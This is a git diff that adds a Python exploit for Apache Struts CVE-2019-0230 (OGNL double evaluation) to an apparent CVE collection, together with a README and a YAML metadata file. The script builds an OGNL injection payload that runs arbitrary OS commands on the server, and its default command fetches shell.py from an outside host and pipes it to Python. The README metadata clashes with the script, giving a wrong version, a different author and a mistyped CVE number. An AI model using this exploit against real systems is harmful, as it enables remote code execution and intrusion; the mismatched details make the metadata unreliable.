diff --git a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py new file mode 100644 index 0000000000000000000000000000000000000000..1551ebacf75d0e0593f930cffcb3d6377d2b2f80 --- /dev/null +++ b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py @@ -0,0 +1,163 @@ +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. +# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." +\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + +stderr.write('error in main %s' % str(error)) \ No newline at end of file diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md new file mode 100644 index 0000000000000000000000000000000000000000..b9a4f94c10b77c0c5162b3b51f0501e42824b08f --- /dev/null +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md @@ -0,0 +1,21 @@ +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +# Usage +``` +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +``` +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 +https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml new file mode 100644 index 0000000000000000000000000000000000000000..e1e4a6e846ed2f110965d3d2507c6fad252e1246 --- /dev/null +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-0230 +source: https://www.exploit-db.com/exploits/49068 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: critical + description: + Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 + scope-of-influence: + Struts 2.0.0 - Struts 2.5.20 + reference: + - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html + - https://cwiki.apache.org/confluence/display/ww/s2-059 + - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html + - https://launchpad.support.sap.com/#/notes/2982840 + - https://www.oracle.com/security-alerts/cpuApr2021.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0230 + cwe-id: CWE-1321 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 diff --git a/openkylin_list.yaml b/openkylin_list.yaml index dfa49367b631b1b8f70c524e6a945db62885ccc0..caeacc6e702250a29a293233beb931db01606d04 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -26,6 +26,8 @@ cve: - CVE-2020-13935 apache-unomi: - CVE-2020-13942 + apache-struts: + - CVE-2019-0230 Influx-DB: - CVE-2019-20933 linux-kernel: